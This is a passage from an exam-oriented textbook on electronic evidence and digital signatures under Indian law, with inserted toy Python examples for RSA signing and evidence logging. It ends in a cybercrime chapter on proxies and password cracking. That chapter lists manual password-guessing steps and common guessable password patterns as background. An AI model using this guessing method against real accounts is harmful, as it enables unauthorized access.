admissibility of a fact must be shown, without any exception. There are even 
cases where a fact which is not relevant to the controversy is considered as 
admissible. Hence it can be led in evidence. 
Q.8. What do you mean by authorship of an electronic record ? 

Ans. When the facts which are sought to be proved by the electronic record 
satisfy the tests of admissibility and relevancy, and the conditions for admissibility 
of a computer output under section 65B are satisfied, then after satisfying these, 
in the next step we have to prove the authorship of the electronic record. 

The author of an electronic record is also a person who may give the 
certificate that the person is occupying a responsible official position in 
respect to operation of the computer. When the computer was regularly used 
to process information and the management of the activities was regularly 
carried on during the period, then the evidence of authorship would be given 
by such person. 

If the author of the electronic record is a person other than the above 
said person, then the other person would have to give the evidence of the 
authorship of the electronic record. For proving a document, the general method 
is to call the person who had executed the document as a witness. The person 
who executed the electronic record, or who is otherwise familiar with the 
execution, would be required to prove the execution. The digital signatures would 
be required to be proved as evidence, if an electronic record has been signed 
digitally. 

The contents are proved as the authorship of a document, though it should 
be kept in mind that there is a distinction between the facts and the events in 
the contents. The definition of fact under section 3 of the Indian Evidence Act 
is — 

(i) Any thing, state of things or relation of things which is perceived 
by the senses. 

(ii) Any mental condition of which a person is conscious. 


Q.9. What is the probative value of electronic evidence ? Also give the 
types of e-evidence. 

Ans. Probative value is the weight to be given to evidence, which is to be 
judged with regard to the circumstances and facts of the case. Depending upon 
the facts of each case, the value to be assigned to any evidence is for the court 
to decide. The court either believes a fact to exist, or considers its existence so 
probable that a sensible man ought, under the circumstances of a particular case, 
to act upon the supposition that it exists. e.g., if a person claims the 
ownership of Red Fort by a statement in an e-mail message sent to others by 
him/her, then the probative value of this statement would be … 

Computer generated evidence is also important in determining its 
probative value. The computer generated evidences are classified as real, 
rumour (hearsay) and derived. 

The calculations which are done by the computer itself using programs/ 
softwares are known as real evidence, e.g., a computer software calculates 
the EMI for a loan account from the principal, rate of interest and time period. 
This computation is described as the most satisfactory kind of evidence, and this 
computation is real evidence. The information supplied to a computer from 
external sources is known as rumour (hearsay) evidence, e.g., number of EMIs 
paid, amount paid etc. are external informations which are supplied to the 
computer by the operator. 

The result generated from real and hearsay evidence is derived evidence, 
e.g., loan amount due to pay, number of EMIs to be paid etc. are derived 
because calculation is used with information supplied by external sources. 

Evidence which is not direct is hearsay evidence. The rule against hearsay 
evidence is not restricted to oral statements and also applies to documents. By this 
rule hearsay evidence is not admissible in any proceedings. 


PROVING DIGITAL SIGNATURES, PROOF OF ELECTRONIC 
AGREEMENTS, PROVING ELECTRONIC MESSAGES 


Q.10. What is a digital signature ? What are its components and its 
applications ? (R.G.P.V., Dec. 2010, June 2011) 
Or 
Explain digital signature. (R.G.P.V., Dec. 2004, 2005) 

Or 

Write short note on — Digital signatures. 
(R.G.P.V., June 2006, Dec. 2015) 
Ans. A digital signature is a document or file attachment that gives proof 
that the document or file has not been modified since creation. Digital signatures 
work like handwritten signatures. For instance, you draw up your will, and 
when it is completed and fulfills certain legal criteria you attach your written 
signature. Your signature is witnessed by others to certify it really was you 
who signed. Later, your attached signature is used to verify the authenticity of 
the content. 

A digital signature is created by taking a hash total for a document or 
file and then encrypting it using the sender’s private key. Then the digital 
signature is attached to the original material and the material is sent. This is 
shown in fig. 4.1. 

[Fig. 4.1 Creating a Digital Signature: Message → Hash → encrypted with the 
Sender’s Private Key → Signature] 

The use of public and private keys separates who can create the signature 
from who can verify it. In fig. 4.1, the sender’s private key was used to encrypt, 
so the publicly available key will be used to decipher. This is shown in fig. 4.2. 

Applications - There are several 
applications of cryptography in network 
security. Most of these applications use public 
keys directly or indirectly. For using a public 
key, a person should prove that he actually owns the public key. That is why, 
the idea of certificates and certificate authorities (CAs) has been developed. 
The CA must sign the certificates to be valid. Such a proof is provided by 
digital signatures. 

Nowadays, protocols using the services of a CA are IPSec, SSL/TLS and 
S/MIME. The PGP protocol also uses certificates. 

Q.11. Discuss the components of digital signature. (R.G.P.V., Nov. 2019) 

Ans. Refer to Q.10. 

Q.12. What are the requirements for a digital signature ? Also give 
Properties of digital signature. 

Ans. We can formulate the following requirements for a digital signature — 

(i) The signature must be a bit pattern that depends on the message 
being signed. 

(ii) The signature must use some information unique to the sender, 
to prevent both forgery and denial. 


(iii) It must be relatively easy to produce the digital signature. 


[Fig. 4.2 Using a Digital Signature at the Receiver: Signature → decrypted with 
the Sender’s Public Key] 

(iv) It must be relatively easy to recognize and verify the digital signature. 

(v) It must be computationally infeasible to forge a digital signature, 
either by constructing a new message for an existing digital signature or by 
constructing a fraudulent digital signature for a given message. 

(vi) It must be practical to retain a copy of the digital signature in 
storage. 

A digital signature should have the following properties — 

(i) It must verify the author and the date and time of the signature. 

(ii) It must authenticate the contents at the time of the signature. 

(iii) It must be verifiable by third parties, to resolve disputes. 


Q.13. What are the basic functions of a signature ? 
Ans. For authenticating or executing a document, putting a mark or writing 
one’s name is referred to as signature. The basic functions of a signature are 
as follows — 

(i) Authentication — The signatory acknowledges that he/she 
authorizes and adopts the text in some meaningful way by signing a document. 

(ii) Identification — The signatory identifies himself/herself 
by the unique style of writing his name or mark, by signing the document. 

(iii) Binding — If a person signs the document then he/she is bound 
to the intent of that document. 

(iv) Security — Everyone has a different style of writing his/her name 
or putting a mark, so this individual style of signing provides security against 
forgery. 

(v) Evidence — A signature is evidence of the above said identification, 
authentication and of being bound to the signed document. 

The above said functions are important for commercial transactions. Since 
e-commerce is growing at a rapid speed, the parties which are involved in 
e-transactions needed a confident system for dealing with each other. Therefore 
an alternative was developed for the cyber world instead of the physical signature on 
paper, because signature plays a vital role in e-commerce. Hence the concept 
of digital signature came into existence. The functions and purpose of digital 
signatures are the same. 


Q.14. What is the idea behind certification authority hierarchy ? 
(R.G.P.V., June 2016) 

Ans. A certification authority is a system that can validate a certificate. 
The authority of acting as a CA has to be with somebody whom everybody 
trusts. … A CA has the authority to issue digital certificates to individuals 
and organizations which want to use those certificates in asymmetric key 
cryptographic applications. 
Q.15. Discuss the concept of digital certificates. 

Ans. A small computer file is known as a digital certificate. For example, 
my digital certificate will be a computer file with a file name like ankit.cer 
(here .cer is from the first three characters of the word certificate; the file 
extension can be different). Just as my passport specifies the association between 
me and my other characteristics like full name, nationality, date and place of 
birth, photograph and signature, a digital certificate specifies the association 
between me and my public key. Fig. 4.3 shows the concept of digital certificates. 
It should be noted that this is only a conceptual view and does not show the 
actual contents of a digital certificate. 

[Fig. 4.3 Conceptual View of a Digital Certificate — a card reading “Digital 
Certificate: This is certified that he has been working since 1990.”] 


It has not been specified who is officially approving the association 
between a user and the user's digital certificate. Clearly, it has to be some 
authority in which all the concerned parties have trust and belief. Suppose a 
case where our passports are not issued by a government office, but by an 
ordinary shopkeeper. Would we trust the passports ? Likewise, digital 
certificates must be issued by some trusted entity. Otherwise there will be no 
trust on anybody's digital certificate. 

We know that a digital certificate establishes the relation between a user 
and her public key. Hence, a digital certificate must have the user name and 
the user's public key. This will prove that a particular public key is related to a 
particular user. In addition, what does a digital certificate keep ? Fig. 4.4 shows 
a simplified view of a sample digital certificate. 

A few interesting things are noted here. Firstly, my name is shown as 
subject name. In fact, any user’s name in a digital certificate is always referred 
to as subject name. Second is the serial number. We shall see what it means in 
due course of time. The certificate also keeps other pieces of information, like 
the validity date range for the certificate and who has issued it (issuer name). 

Digital Certificate 
Subject Name : Ankit Verma 
Public Key : <Ankit’s key> 
Serial Number : 1029 
Other data : Email kaverma@indiatimes.com 
Valid From : 01 Jan. 2009 
Valid To : 31 Dec. 2015 
Issuer Name : VeriSign 
Fig. 4.4 Example of a Digital Certificate 

Fig. 4.5 shows the meanings of these pieces of information by comparing 
them with the corresponding entries in my passport. 

[Fig. 4.5 Digital certificate fields compared with passport entries (e.g., the 
passport entry carrying the photograph and signature)] 

Every digital certificate has a unique serial number just as every passport 
has a unique passport number. No two passports can have the same passport 
number. Likewise, no two digital certificates can have the same serial number. 

Q.16. What is a digital certificate ? What is the process of obtaining a 
digital certificate ? (R.G.P.V., Dec. 2010, June …) 

Ans. Digital Certificate — Refer to Q.15. 

The steps involved in certificate creation are as follows — 

(i) Key Generation — The action starts with the subject (that is, the 
user/organization) who needs to get a certificate. There are two different 
methods for this purpose — 

(a) The subject can generate a private key and public key pair 
with the help of some software. Usually this software is a part of the Web 
browser or Web server. Alternatively, special software programs are used for 
this. The subject must keep the private key thus generated a secret. Then the 
subject sends the public key as well as other information and evidences about 
herself to the RA. Fig. 4.6 shows this. 


(b) Alternatively, the RA can create a key pair on the subject’s 
behalf. This can occur in cases where either a particular requirement demands 
that the key pair must be centrally generated and distributed by the RA for the 
sake of enforcing security policies and key management, or the user is not 
aware of the technicalities involved in the generation of a key pair. Of course, 
the drawbacks of this approach are the possibility of the RA knowing the 
private key of the user, as well as the scope for this key to be exposed to 
others while in transit after it is generated and sent to the suitable user. Fig. 4.7 
shows this. 

[Fig. 4.7 RA Generating a Key Pair on Behalf of the Subject: Registration 
Authority → Public Key for User X and Private Key for User X → User X] 

(ii) Registration — This step is needed only if the user creates the 
key pair in the first step. If the RA creates the key pair on the user’s behalf, this 
step will also be a part of the first step itself. 

Assuming that the user has created the key pair, the user now sends the 
public key and the associated registration information and all the evidence related 
to herself to the RA. For this purpose, the software provides a wizard in which data 
is entered by the user and, when all data is correct, the user submits it. Then this 
data goes over the network/Internet to the RA. The certificate request format has 
been standardized and is called a Certificate Signing Request (CSR). This is one of 
the Public Key Cryptography Standards (PKCS). The CSR is also … 

[Fig. 4.6 Subject Generating its Own Key Pair: Subject (Private Key, Public Key) 
→ Registration Authority] 
However, the evidence may not be in the form of computer files; it 
usually comprises paper-based documents like a copy of the passport, 
business documents or income/tax statements, etc. Fig. 4.8 shows this. 
(iii) Verification — After the registration process, the RA verifies the 
user’s credentials. This verification is done in two respects, as follows — 

(a) Firstly, the RA wants to verify the user’s credentials, i.e., that the 
evidences provided are correct and acceptable. If the user is an individual user, 
then simpler checks, like verifying the postal address, email id, phone number, 
passport or driving license details, can be enough. If it is actually an organization, 
then the RA would perhaps like to check the business records, historical 
documents and credibility proofs. 

(b) Secondly, the RA must ensure that the user who is requesting the 
certificate does indeed keep the private key corresponding to the public key 
that is sent as a part of the certificate request to the RA. This is most important, 
since there must be a record that the user keeps the private key corresponding 
to the given public key. Otherwise, this can cause legal problems. This is 
known as checking the Proof Of Possession (POP) of the private key. The RA 
uses the following approaches to perform this check — 

(1) The RA can demand that the user must digitally sign her 
Certificate Signing Request (CSR) using her private key. If the RA can verify 
the signature properly with the help of the public key of the user, the RA can 
believe that the user indeed keeps the private key. 

(2) Alternatively, at this stage, the RA can generate a random 
number challenge, encrypt it with the user’s public key and send the encrypted 
challenge to the user. If the user can properly decrypt the challenge using her 
private key, the RA can believe that the user keeps the right private key. 

(3) The RA can actually create a dummy certificate for the 
user, encrypt it using the user’s public key and send it to the user. The user can 
use it only if she can decrypt the encrypted certificate and get the plaintext 
certificate. 


(iv) Certificate Creation — Assuming that all the steps so far have 
been successful, the RA provides all the details of the user to the CA. The CA 
verifies them itself (if needed) and generates a digital certificate for the user. There 
exist programs for creating certificates in the X.509 standard format. The CA 
transmits the certificate to the user and also keeps a copy of the certificate for 
its own record. The CA’s certificate copy is kept in a certificate directory. The 
CA maintains this central storage location. The contents of the certificate 
directory are similar to those of a telephone directory. This provides a 
single point of access for certificate management and distribution. 
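The signing scheme of figs. 4.1 and 4.2 and the two Proof of Possession checks of step (iii)(b), as an added Python example (not the book's code): textbook-RSA with constructed toy primes, SHA-256 as the hash, and the names PublicKey, PrivateKey, make_keypair, sign, verify, pop_by_signed_csr and pop_by_challenge are all assumptions of this example. 

```python
"""Toy RSA digital signature (fig. 4.1 / 4.2) and RA Proof-of-Possession checks.

Added example, not the book's code. The RSA parameters are constructed textbook
primes: far too small for real use, but they make the key relationships visible.
A real deployment uses a vetted library (e.g. 2048-bit RSA with PKCS#1 padding).
"""
from __future__ import annotations

import hashlib
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class PublicKey:
    n: int
    e: int


@dataclass(frozen=True)
class PrivateKey:
    n: int
    d: int


def make_keypair(p: int, q: int, e: int = 17):
    """Build an RSA key pair from two primes. The private exponent d is the
    modular inverse of e modulo (p-1)(q-1); pow(e, -1, m) needs Python 3.8+."""
    n, phi = p * q, (p - 1) * (q - 1)
    return PublicKey(n, e), PrivateKey(n, pow(e, -1, phi))


def digest_int(message: bytes, n: int) -> int:
    """SHA-256 the message and reduce the digest into the range [0, n).
    (With a real-sized modulus the digest is padded instead of reduced.)"""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, priv: PrivateKey) -> int:
    """Fig. 4.1: hash the message, then 'encrypt' the hash with the private key."""
    return pow(digest_int(message, priv.n), priv.d, priv.n)


def verify(message: bytes, signature: int, pub: PublicKey) -> bool:
    """Fig. 4.2: 'decrypt' the signature with the public key and compare it with
    a fresh hash of the received message. Any change to the message or the
    signature, or a signature made with another key, makes this return False."""
    return pow(signature, pub.e, pub.n) == digest_int(message, pub.n)


# --- Proof of Possession (POP), step (iii)(b) of certificate creation ---

def pop_by_signed_csr(csr: bytes, csr_signature: int, pub: PublicKey) -> bool:
    """Approach (1): the applicant signs the CSR; the RA verifies it with the
    public key carried in that same CSR."""
    return verify(csr, csr_signature, pub)


def ra_make_challenge(pub: PublicKey, r: int | None = None):
    """Approach (2), RA side: pick a random number and encrypt it with the
    applicant's public key. Returns (secret r, encrypted challenge)."""
    if r is None:
        r = secrets.randbelow(pub.n - 2) + 2
    return r, pow(r, pub.e, pub.n)


def subject_answer_challenge(encrypted: int, priv: PrivateKey) -> int:
    """Approach (2), subject side: only the holder of the private key can
    recover the RA's number."""
    return pow(encrypted, priv.d, priv.n)


def pop_by_challenge(pub: PublicKey, priv: PrivateKey, r: int | None = None) -> bool:
    """Run the full challenge/response and report whether priv matches pub."""
    secret, encrypted = ra_make_challenge(pub, r)
    return subject_answer_challenge(encrypted, priv) == secret


if __name__ == "__main__":
    ankit_pub, ankit_priv = make_keypair(61, 53)   # constructed: n = 3233, d = 2753
    other_pub, other_priv = make_keypair(47, 59)   # a second, unrelated key pair
    will = b"I, Ankit Verma, leave my printers to JJ Ltd."   # constructed message
    sig = sign(will, ankit_priv)
    print("genuine signature verifies:   ", verify(will, sig, ankit_pub))
    print("altered message verifies:     ", verify(will + b"!", sig, ankit_pub))
    print("wrong public key verifies:    ", verify(will, sig, other_pub))
    csr = b"Subject Name: Ankit Verma; Public Key: " + repr(ankit_pub).encode()
    print("POP via signed CSR:           ", pop_by_signed_csr(csr, sign(csr, ankit_priv), ankit_pub))
    print("POP via challenge, right key: ", pop_by_challenge(ankit_pub, ankit_priv))
    print("POP via challenge, wrong key: ", pop_by_challenge(ankit_pub, other_priv))
```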


No single standard exists that interprets the structure of a certificate 
directory. However, the X.500 standard is growing as a popular alternative. It 
permits storage of not only the digital certificates, but also information about 
the printers, network resources, the user’s personal information, telephone 
numbers/extensions, email ids, etc. at a central place in what are called 
directory servers. From this central repository, the directory clients can request 
the required information with the help of a directory access protocol, like the 
Lightweight Directory Access Protocol (LDAP). LDAP permits users and 
applications to access X.500 directories, based on their privileges. 

Then the CA sends the certificate to the user. This is attached to an 
email, or the CA sends an email to the user, informing that the certificate is 
ready and that the user should download it from the CA’s site. 

Q.17. How can we verify the digital signatures ? 

Q. 17. How can 

Ans. The Indian IT Act 2000 amended the Indian Evidence Act to 
provide that, except in the case of a secure digital signature, if the digital 
signature of any person is alleged to have been affixed to an electronic record, 
then such digital signature is to be proved by the person. Section 73A, 
introduced in the Indian Evidence Act, defines to the court how digital signatures 
are verified. 

To verify a digital signature produced by the subscriber, the court may 
direct — 

(i) That the controller or the certifying authority produce the 
digital signature certificate. 

(ii) Any other person to apply the public key in order to verify the 
digital signature. 

The opinion of the certifying authority which issued the digital signature 
certificate will be the relevant fact when the court forms an opinion about the 
digital signature of a person. 

In order to ascertain whether a digital signature is that of the person by whom 
it is claimed to have been affixed, the court has been empowered to direct — 

(i) The controller or the certifying authority to produce the digital 
signature certificate. 

(ii) Any other person to apply the public key listed in the digital signature 
certificate and verify the digital signature claimed to have been affixed by that person. 

To prove the digital signatures, the digital signature certificate plays an 
important role, as seen in both above said conditions. The IT Act 2000 
introduced section 85C of the Indian Evidence Act, which describes that unless the 
contrary is proved, the information contained in a digital signature certificate is 
correct, where the digital signature certificate is accepted by the subscriber. 
The information provided by the subscriber, which has not been verified, is 
not included in it. Hence the person who is relying on that information will 
have to prove it in any proceedings where proof of it is essential. 
The secure digital signatures have a special legal status. If it can be verified 
that a digital signature, at the time when it was affixed, was — 
(i) Unique to the subscriber who was affixing it, 
(ii) Capable of identifying such subscriber, 
(iii) Created in a manner or using a means under the exclusive control 
of the subscriber, 
then such digital signature is assumed to be a secure digital signature. 
Until the contrary is proved, the court shall assume that it has been affixed 
with the intention of signing or approving the electronic record, where a secure 
digital signature is involved. 


Q.18. What do you mean by proof of electronic agreements ? 

Ans. The electronic agreements can be classified into the following 
categories — 

(i) Electronic agreement on which both parties affixed digital signatures. 
(ii) Electronic agreement between the parties sending messages 
through e-mail — 
(a) The party sending the message with digital signature, 
(b) The party sending the message without digital signature. 

Section 85A of the Indian Evidence Act 1872 has been assumed to include 
the definition for electronic agreements signed by both parties — 

“The court shall presume that every electronic record purporting to be an 
agreement containing the digital signatures of the parties was concluded by 
affixing the digital signatures of both parties”. 

Here the words ‘unless the contrary is proved’ are not included, but the 
presumption is still not conclusive and is rebuttable. It implies that it is the 
responsibility of a person to prove that the agreement was not concluded by 
affixing the digital signatures. 

Beyond the status of electronic records, the proof of terms and conditions was an important issue both before and after the IT Act 2000. According to section 91 of the Indian Evidence Act 1872, when the terms of a contract are reduced to the form of a document, no evidence other than the document itself can be given in proof of the terms of such a contract. However, admissible oral evidence can be used to prove other facts about the contract.

There is a confusing issue as to whether section 91 would be applied to an electronic agreement, because of the status of electronic records as documentary evidence prior to and after the IT Act. It may be that the legislature did not want to apply this provision to electronic agreements, because section 91 of the Indian Evidence Act 1872 has not been amended as sections 17, 34, 35 etc. have been. On the other hand, even before the IT Act 2000 electronic records were treated as documents, so section 91 would be applied to the electronic agreement: no evidence of the terms and conditions of the electronic agreement can be given except the e-agreement itself. The digital signatures on the e-agreement would then be required to be proved, because of the principle of digital signature.
Q.19. What are the rules of digital evidence ?

Ans. There are a number of sources like seized computer hard drives and backup media, real-time e-mail messages, chat room logs, Internet service provider records etc. from where digital evidence originates. The rules for collecting digital evidence are as follows —

(i) We can collect the digital evidence by engaging the appropriate incident handling and law enforcement personnel.

(ii) By capturing a picture of the system as accurate as possible.

(iii) We can collect digital evidence by keeping detailed notes with dates and times, and an automatic transcript should be generated if possible. Notes and printouts should be signed and dated.

(iv) We should note the difference between the system clock and coordinated universal time (UTC). For each timestamp it should be indicated whether UTC or local time is used.

(v) We should check our work by outlining all the actions we took and at what times. For this, detailed notes will be needed.

(vi) The data collected should be changed as little as possible. This is not limited to content changes; we should also avoid updating file or directory access times.

(vii) When we are confused about choosing between collection and analysis, we should do collection first and analysis later.

(viii) Our procedures should be implementable and should be tested to ensure feasibility, particularly in a crisis, with respect to an incident response policy.

(ix) A systematic approach should be adopted to follow the guidelines laid down in our collection procedure, for each device. Since speed is a critical issue, when we need to examine a number of devices we should spread the work among our team to collect the evidence in parallel.

(x) Evidence should be collected from the most volatile to the least volatile source. The order of volatility is as follows —

(a) Registers and cache memory, because as soon as the power is switched off the data will be lost.

(b) Routing table, ARP cache, process table, kernel statistics and memory are also volatile.

(c) Temporary file systems are less volatile than the above.

(d) Disk is less volatile than the above.

(e) Remote logging and monitoring data that is relevant to the system.

(f) Physical configuration and network topology.

(g) Archival media is the least volatile; the data will be stored even after the power is switched off.
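The rules above can be mechanised. The following is an added example, not from the textbook: it visits constructed stand-in captures in the order of volatility of rule (x), hashes each capture without modifying it (rule (vi)), records the collector, a UTC timestamp and the measured system-clock offset (rules (iii) and (iv)), and chains each record to the previous one so later alteration or reordering of the notes is detectable. All source names, field names and sample bytes are assumptions made for the example.

```python
"""Evidence collection in order of volatility with a hash-chained custody log.

Added example, not from the textbook. The sample "sources" are constructed
in-memory stand-ins for real captures (registers, ARP cache, disk image ...).
"""
import hashlib
import json
from datetime import datetime, timedelta, timezone
from typing import Optional

# Order of volatility from rule (x) above: most volatile first.
VOLATILITY_ORDER = [
    "registers_and_cache", "routing_table", "arp_cache", "process_table",
    "kernel_statistics", "memory", "temporary_filesystems", "disk",
    "remote_logs", "physical_config_and_topology", "archival_media",
]
GENESIS = "0" * 64  # prev-hash of the first record


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _record_digest(record: dict) -> str:
    # Canonical JSON of every field except the record's own digest.
    body = {k: v for k, v in record.items() if k != "record_sha256"}
    return sha256_hex(json.dumps(body, sort_keys=True).encode())


def system_time_to_utc(system_ts_iso: str, clock_offset_s: float) -> str:
    """Rule (iv): convert a naive system-clock reading (ISO 8601 string) to
    UTC using the offset (system clock minus UTC) measured at collection."""
    naive = datetime.fromisoformat(system_ts_iso)
    corrected = naive - timedelta(seconds=clock_offset_s)
    return corrected.replace(tzinfo=timezone.utc).isoformat()


def collect_in_order(sources: dict, collector: str, clock_offset_s: float,
                     collected_at: Optional[datetime] = None) -> list:
    """Visit `sources` (name -> captured bytes) from most to least volatile,
    hashing each capture and appending a dated, collector-attributed record
    whose digest chains to the previous record (rules (iii), (iv), (x))."""
    when = (collected_at or datetime.now(timezone.utc)).isoformat()
    rank = {name: i for i, name in enumerate(VOLATILITY_ORDER)}
    ordered = sorted(sources, key=lambda n: rank.get(n, len(rank)))
    records, prev = [], GENESIS
    for seq, name in enumerate(ordered):
        data = sources[name]
        record = {
            "seq": seq,
            "source": name,
            "collector": collector,
            "collected_at": when,
            "timestamp_is_utc": True,          # rule (iv): say which clock
            "system_clock_offset_s": clock_offset_s,
            "size": len(data),
            "sha256": sha256_hex(data),        # the capture itself is untouched
            "prev_record_sha256": prev,
        }
        record["record_sha256"] = prev = _record_digest(record)
        records.append(record)
    return records


def verify_log(records: list, sources: dict) -> tuple:
    """Re-check the chain and that the retained copies still match the
    hashes recorded at collection time; returns (ok, reason)."""
    prev = GENESIS
    for seq, rec in enumerate(records):
        if rec["seq"] != seq or rec["prev_record_sha256"] != prev:
            return False, f"chain broken at record {seq}"
        if _record_digest(rec) != rec["record_sha256"]:
            return False, f"record {seq} was altered after it was written"
        if sha256_hex(sources.get(rec["source"], b"")) != rec["sha256"]:
            return False, f"capture for {rec['source']} no longer matches"
        prev = rec["record_sha256"]
    return True, "ok"


# Constructed sample captures (not real data), deliberately listed out of order.
SAMPLE_SOURCES = {
    "disk": b"<constructed raw disk image>",
    "arp_cache": b"10.0.0.1 aa:bb:cc:dd:ee:01\n10.0.0.7 aa:bb:cc:dd:ee:07\n",
    "registers_and_cache": b"rax=0x1 rip=0x401000",
    "archival_media": b"<constructed backup tape contents>",
    "memory": b"<constructed memory dump>",
}

if __name__ == "__main__":
    log = collect_in_order(SAMPLE_SOURCES, "analyst-1", clock_offset_s=37.0)
    print([r["source"] for r in log])
    print(verify_log(log, SAMPLE_SOURCES))
```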


Q.20. What do you mean by proving electronic messages ?

Ans. Electronic messages are admissible as documentary evidence as these are also electronic records. Here we shall study the proof of e-messages under the law of evidence. Since use of the Internet is growing day by day, e-mail evidence can also be presented to the courts in civil and criminal trials. Although electronic message technology is an efficient, easy to use and cost-free mode of communication, the probative value of an electronic message is a question. Today anyone can easily open accounts in the names of other persons and send messages to each other, and can create violence among them by sending messages. Thus the e-mail system is vulnerable to misuse and abuse.

The concept of digital signature enhances the evidentiary value of messages on which digital signatures are affixed. The key which is used to encrypt the data and is recognized as the digital signature under the IT Act, 2000, is unique to the data and the subscriber. Since the signatory can be identified by the digital signature, the digital signature uplifts the evidentiary value of the signed e-message. The acknowledgement of receipt of an electronic record and the identification of the originator and addressee are defined in section 12 of the IT Act 2000. Hence, proof of these ingredients may be applicable to the factual matrix. These ingredients would be good evidence for identifying the originator and addressee and the sending or receiving of the e-message, which is sought to be proved.

Section 12 of the IT Act 2000 is described as given below —

(i) If the originator has not agreed with the addressee that the acknowledgement of receipt of the electronic record be given in a particular form or by a particular method, then an acknowledgement may be given by —

(a) Any communication by the addressee, automated or otherwise.

(b) Any conduct of the addressee, sufficient to indicate to the originator that the electronic record has been received.

(ii) Where the originator has specified that the electronic record shall be binding only on receipt of an acknowledgement of such electronic record by him, then unless the acknowledgement has been received, the electronic record shall be considered to never have been sent by the originator.

(iii) Where the originator has not specified that the electronic record shall be binding only on receipt of acknowledgement, and the acknowledgement has not been received by the originator within the time specified or agreed, or if no time has been specified or agreed then within a reasonable time, the originator may give notice to the addressee stating that no acknowledgement has been received by him and specifying a reasonable time by which the acknowledgement must be received by him. If within the above said time no acknowledgement is received, he may treat the electronic record as though it has never been sent, after giving notice to the addressee.
Q.21. What is the role of digital signature in digital evidence ? (R.G.P.V., Nov. 2018)

Ans. To define electronic signature, a new section named section 3A was introduced in the Indian IT Act, retaining section 3 on digital signatures. An electronic signature is an alternative proposed to the digital signature. Both of these are used for authentication of digital evidence (electronic records). So the authorities need to accommodate both digital signature and electronic signature.

Notwithstanding anything contained in section 3, but according to the provisions of subsection (2), any electronic record (digital evidence) may be authenticated by a subscriber using an electronic signature that is considered reliable and may be specified in the second schedule.

The electronic signature or digital signature technique shall be considered reliable if —

(i) At the time of signing, the authentication data or signature creation data were under the control of the signatory or, as the case may be, the authenticator, and of no other person.

(ii) After affixing the digital signature, any alteration made to the digital signature is detectable.

(iii) After authenticating the information by digital signature, any alteration made to it is detectable.

(iv) The signature creation data or the authentication data linked to the signatory are within the context in which they are used.

For the purpose of ascertaining whether the person by whom the digital signature is claimed to have been affixed or authenticated did so, the Central Government may prescribe the procedure. It should be notified in the Official Gazette of the Central Government to add or omit a digital signature and the procedure for affixing such signature from the second schedule.

Q.22. How can we check the validity of digital evidence ? (R.G.P.V., Nov. 2018, 2019)

Ans. The process used in the case of digital evidence copies the process used for other evidence; this is only logical. The process must be documented, reliable and repeatable, since each step requires the use of tools or knowledge.
To understand digital evidence is both a legal and a technical problem. Actually both of these aspects are related. The law specifies under what conditions what can be seized, from where and from whom. It is necessary to determine what particular piece of digital evidence is needed for checking validity, i.e. is it a particular file, an executable program or a word processing document etc. It may also be required to check where a particular piece of evidence is physically located. It may also be necessary to show a technical basis for obtaining the legal authority to search. There are a number of contexts involved in actually validating a piece of digital evidence; three of them are as follows —

(i) Physical Context — It must be definable in its physical form, i.e., it should reside on a specific piece of media.

(ii) Logical Context — It must be identifiable as to its logical position, i.e., where it resides relative to the file system.

(iii) Legal Context — We must place the evidence in the correct context to read its meaning. This may require looking at the evidence as machine language.


The path taken by digital evidence is shown in fig. 4.9 given below —

Fig. 4.9 Path of Digital Evidence (figure not reproduced; its boxes are labelled Physical Context, Legal Context, Logical Context, Information and Evidence)


Once the extraction of digital evidence from a number of sources, such as the hard drives of seized computers, real-time e-mail messages, Internet service provider records, webpages, digital network traffic etc., is completed, the validity of the extracted data is checked.

Digital evidence is valid if it is admissible in the court or before law enforcement agencies having jurisdiction, and accepted. If the court or law enforcement agencies accept the digital evidence as evidence for any crime, then the digital evidence is valid.


TOOLS AND METHODS IN CYBERCRIME — PROXY SERVERS AND ANONYMIZERS, PASSWORD CRACKING, KEY LOGGERS AND SPYWARE, VIRUS AND WORMS, TROJAN HORSES, BACKDOORS


Q.1. What is proxy server ? How attackers attack on proxy server ?

Ans. A computer which acts as an intermediary for connections between other computers on a network is known as a proxy server.

The attackers try to establish a connection with the target system by connecting to a proxy server, through an existing connection with the proxy. Doing so the attacker is able to surf the web in parallel and/or hide the attack. A client connects to the proxy server and requests some service that is available from a different server. The proxy server evaluates the request, establishes a connection to the respective server and/or requests the required service on behalf of the client, and the resources are then provided to the client. A proxy server can thus allow an attacker to hide his identity.

The purposes of a proxy server are as follows —

(i) A proxy server keeps the systems hidden, which means it secures the systems.

(ii) It uses caching to speed up access to a resource. It caches web-pages from web servers.

(iii) Unwanted contents are filtered by some special proxy servers.

(iv) To enable a number of computers to connect to the Internet when one has only one IP address, a proxy server can be used as an IP address multiplexer.

A proxy server has the advantage that its cache memory can serve all users. If different users are requesting one or more websites, then these are likely to be in the proxy server's cache memory, which will improve user response time.


Q.2. What is an anonymizer ? How do anonymizers work ? (R.G.P.V., Nov. 2019)

Ans. A tool that attempts to make activity on the Internet untraceable is known as an anonymous proxy or anonymizer. It protects the user's personal information by hiding the computer's identifying information and accesses the Internet on the user's behalf. The services that make web surfing anonymous by utilizing a website that acts as a proxy server are also known as anonymizers. The first anonymizer was developed by Lance Cottrell. To surf on the Internet, the anonymizer hides or removes all the information of the user's computer.


Q.3. What do you mean by password cracking ? Explain in brief.

Ans. Like a lock, a password is a key to get entry into computer systems. The process of recovering passwords from the data that have been stored in or transmitted by a computer is known as password cracking. Generally a common approach is followed by an attacker for making guesses for the password. The purposes of password cracking are as follows —

(i) It can be used to recover a forgotten password.

(ii) System administrators can use it in a preventive manner, to check for easily crackable passwords.

(iii) Password cracking can be used to gain unauthorized access to a system in which the attacker is not authenticated.

An attempt to logon with different passwords is known as manual password cracking. In manual password cracking the following steps are followed —

(i) A valid user account is found out.

(ii) A list of possible passwords is created.

(iii) Passwords are ranked from high to low probability.

(iv) Try again and again to get a successful password.

Some passwords can be guessed with knowledge of the user's personal information. Some guessable passwords are as follows —

(i) Default passwords such as password, admin and administrator etc.

(ii) Sequences of letters from the QWERTY keyboard, e.g., qwerty.

(iii) The user's name or login name can be used to guess the password.

(iv) A family member's name can also be used to guess the password.

(v) D.O.B., birth place etc. can be used to guess the password.

(vi) Attackers can use the user's mobile number, vehicle number, house number etc. to guess the password.

(vii) A sequence of numbers such as 123456, 1234 can also be used to guess the password.

An attacker can also try each password in a list. It is done in manual cracking and is considered as time consuming and usually
